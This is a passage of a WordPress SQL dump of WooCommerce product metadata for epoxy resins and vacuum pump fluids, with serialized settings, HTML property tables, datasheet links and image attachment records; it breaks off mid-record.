INSERT INTO `wp_postmeta` VALUES (9408, 939, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9409, 939, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9410, 939, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9411, 939, '318_custom_list_file', 'a:2:{s:32:"deab948fe6350fe8a1394dfb7e94d91c";a:3:{s:4:"name";s:10:"EPON 1004F";s:4:"file";s:70:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/1004F.pdf";s:4:"desc";s:14:"EPON 1004F TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (9412, 939, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (9413, 939, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9414, 939, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9415, 939, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9416, 939, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9417, 939, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9418, 939, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9419, 939, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9420, 939, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9421, 939, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9422, 939, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9423, 939, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9424, 939, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9425, 939, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9426, 939, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9427, 939, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9428, 939, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9429, 939, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9430, 939, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9431, 939, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9432, 939, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9433, 939, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9434, 939, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9435, 939, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9436, 939, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9437, 939, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9438, 939, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9439, 939, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9440, 939, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9441, 939, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (9442, 939, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9443, 941, '_edit_lock', '1474469648:2'); 
INSERT INTO `wp_postmeta` VALUES (9507, 943, '_edit_lock', '1475671295:2'); 
INSERT INTO `wp_postmeta` VALUES (9508, 943, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (9509, 943, '_thumbnail_id', '907'); 
INSERT INTO `wp_postmeta` VALUES (9510, 943, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9511, 943, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9512, 943, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="6" width="1214"><strong>VPF Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;"><strong>1506</strong></td>\r\n<td style="text-align: center;"><strong>1514</strong></td>\r\n<td style="text-align: center;"><strong>1525</strong></td>\r\n<td style="text-align: center;"><strong>1531</strong></td>\r\n<td style="text-align: center;"><strong>16256</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Kinematic Viscosity (cSt)</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>@20°C</strong></td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">140</td>\r\n<td style="text-align: center;">250</td>\r\n<td style="text-align: center;">310</td>\r\n<td style="text-align: center;">2560</td>\r\n</tr>\r\n<tr>\r\n<td><strong>@100°C</strong></td>\r\n<td style="text-align: center;">4.1</td>\r\n<td style="text-align: center;">7.2</td>\r\n<td style="text-align: center;">10.6</td>\r\n<td style="text-align: center;">12.5</td>\r\n<td style="text-align: center;">64.6</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Density (g/cc)</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><strong>@20°C</strong></td>\r\n<td style="text-align: center;">1.88</td>\r\n<td style="text-align: center;">1.89</td>\r\n<td style="text-align: center;">1.9</td>\r\n<td style="text-align: center;">1.9</td>\r\n<td style="text-align: center;">1.92</td>\r\n</tr>\r\n<tr>\r\n<td><strong>@100°C</strong></td>\r\n<td style="text-align: center;">1.73</td>\r\n<td style="text-align: center;">1.74</td>\r\n<td style="text-align: center;">1.75</td>\r\n<td style="text-align: center;">1.75</td>\r\n<td style="text-align: center;">1.78</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Pour Point °C (°F)</strong></td>\r\n<td style="text-align: center;">-60(-76)</td>\r\n<td style="text-align: center;">-54(-76)</td>\r\n<td style="text-align: center;">-48(-54)</td>\r\n<td style="text-align: center;">-41(-42)</td>\r\n<td style="text-align: center;">-15(5)</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">NSF H-1</td>\r\n<td style="text-align: center;">NSF H-1</td>\r\n<td style="text-align: center;">NSF H-1</td>\r\n<td style="text-align: center;">No</td>\r\n<td style="text-align: center;">No</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (9513, 943, '716_default_editor', '<ul>\r\n 	<li>Vacuum Pumps</li>\r\n 	<li>Semi-Conductors</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (9514, 943, '719_default_editor', '<ul>\r\n 	<li>NSF H-1 Rated</li>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D1160</li>\r\n 	<li>ASTM D2595</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (9515, 943, '318_custom_list_file', 'a:1:{s:32:"1ba57932add5f8af8c408e4082fafaed";a:3:{s:4:"name";s:7:"VPF SDS";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VPF.pdf";s:4:"desc";s:17:"Safety Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (9516, 943, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (9517, 943, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9518, 943, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9519, 943, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9520, 943, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9521, 943, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9522, 943, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9523, 943, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9524, 943, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9525, 943, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9526, 943, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9527, 943, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9528, 943, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9529, 943, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9530, 943, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9531, 943, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9532, 943, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9533, 943, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9534, 943, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9535, 943, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9536, 943, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9537, 943, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9538, 943, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9539, 943, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9540, 943, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9541, 943, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9542, 943, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9543, 943, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (9570, 943, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9571, 943, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9572, 943, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9579, 903, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9580, 912, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9581, 910, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9582, 941, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (9583, 944, '_edit_lock', '1475671364:2'); 
INSERT INTO `wp_postmeta` VALUES (9584, 944, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (9586, 944, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9587, 944, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9588, 944, '312_default_editor', '<table width="1214">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="6" width="1214"><strong>VPF Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;"><strong>1506</strong></td>\r\n<td style="text-align: center;"><strong>1514</strong></td>\r\n<td style="text-align: center;"><strong>1525</strong></td>\r\n<td style="text-align: center;"><strong>1531</strong></td>\r\n<td style="text-align: center;"><strong>16256</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Kinematic Viscosity (cSt)</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>@20°C</strong></td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">140</td>\r\n<td style="text-align: center;">250</td>\r\n<td style="text-align: center;">310</td>\r\n<td style="text-align: center;">2560</td>\r\n</tr>\r\n<tr>\r\n<td><strong>@100°C</strong></td>\r\n<td style="text-align: center;">4.1</td>\r\n<td style="text-align: center;">7.2</td>\r\n<td style="text-align: center;">10.6</td>\r\n<td style="text-align: center;">12.5</td>\r\n<td style="text-align: center;">64.6</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Density (g/cc)</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><strong>@20°C</strong></td>\r\n<td style="text-align: center;">1.88</td>\r\n<td style="text-align: center;">1.89</td>\r\n<td style="text-align: center;">1.9</td>\r\n<td style="text-align: center;">1.9</td>\r\n<td style="text-align: center;">1.92</td>\r\n</tr>\r\n<tr>\r\n<td><strong>@100°C</strong></td>\r\n<td style="text-align: center;">1.73</td>\r\n<td style="text-align: center;">1.74</td>\r\n<td style="text-align: center;">1.75</td>\r\n<td style="text-align: center;">1.75</td>\r\n<td style="text-align: center;">1.78</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Pour Point °C (°F)</strong></td>\r\n<td style="text-align: center;">-60(-76)</td>\r\n<td style="text-align: center;">-54(-76)</td>\r\n<td style="text-align: center;">-48(-54)</td>\r\n<td style="text-align: center;">-41(-42)</td>\r\n<td style="text-align: center;">-15(5)</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">NSF H-1</td>\r\n<td style="text-align: center;">NSF H-1</td>\r\n<td style="text-align: center;">NSF H-1</td>\r\n<td style="text-align: center;">No</td>\r\n<td style="text-align: center;">No</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (9589, 944, '716_default_editor', '<ul>\r\n 	<li>Vacuum Pumps</li>\r\n 	<li>Semi-Conductors</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (9590, 944, '719_default_editor', '<ul>\r\n 	<li>NSF H-1 Rated</li>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D1160</li>\r\n 	<li>ASTM D2595</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (9591, 944, '318_custom_list_file', 'a:1:{s:32:"1ba57932add5f8af8c408e4082fafaed";a:3:{s:4:"name";s:7:"VPF SDS";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/VPF.pdf";s:4:"desc";s:17:"Safety Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (9592, 944, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (9593, 944, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9594, 944, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9595, 944, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9596, 944, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9597, 944, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9598, 944, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9599, 944, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9600, 944, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9601, 944, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9602, 944, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9603, 944, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9604, 944, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9605, 944, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9606, 944, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9607, 944, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9608, 944, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9609, 944, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9610, 944, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9611, 944, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9612, 944, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9613, 944, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9614, 944, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9615, 944, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9616, 944, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9617, 944, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9618, 944, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9619, 944, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (9646, 944, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9647, 944, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9648, 944, '_thumbnail_id', '909'); 
INSERT INTO `wp_postmeta` VALUES (9649, 888, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9650, 945, '_wp_attached_file', '2016/08/IMG_12541.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9651, 945, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:21:"2016/08/IMG_12541.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"IMG_12541-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"IMG_12541-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"IMG_12541-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:23:"IMG_12541-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:21:"IMG_12541-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:21:"IMG_12541-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:21:"IMG_12541-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:21:"IMG_12541-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (9652, 944, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (9653, 946, '_wp_attached_file', '2016/08/1007F.pdf'); 
INSERT INTO `wp_postmeta` VALUES (9654, 941, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (9655, 941, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (9656, 941, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9657, 941, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9658, 941, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (9659, 941, '318_custom_list_file', 'a:2:{s:32:"98fb42628863dfcb0c2a841cd8a553c3";a:3:{s:4:"name";s:10:"EPON 1007F";s:4:"file";s:70:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/1007F.pdf";s:4:"desc";s:14:"EPON 1007F TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (9660, 941, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (9661, 941, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (9662, 941, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (9663, 941, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9664, 941, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9665, 941, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (9666, 941, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9667, 941, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (9668, 941, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (9669, 941, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (9670, 941, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (9671, 941, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (9672, 941, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9673, 941, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9674, 941, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9675, 941, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (9676, 941, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (9677, 941, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (9678, 941, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (9679, 941, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9680, 941, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9681, 941, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (9682, 941, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9683, 941, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (9684, 941, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (9685, 941, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9686, 941, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (9687, 941, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (9688, 941, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (9689, 941, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (9690, 947, '_wp_attached_file', '2016/08/EPON-Novolac-resins.jpg'); 
INSERT INTO `wp_postmeta` VALUES (9691, 947, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5152;s:6:"height";i:3264;s:4:"file";s:31:"2016/08/EPON-Novolac-resins.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-800x507.jpg";s:5:"width";i:800;s:6:"height";i:507;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-768x487.jpg";s:5:"width";i:768;s:6:"height";i:487;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"EPON-Novolac-resins-1600x1014.jpg";s:5:"width";i:1600;s:6:"height";i:1014;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"EPON-Novolac-resins-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}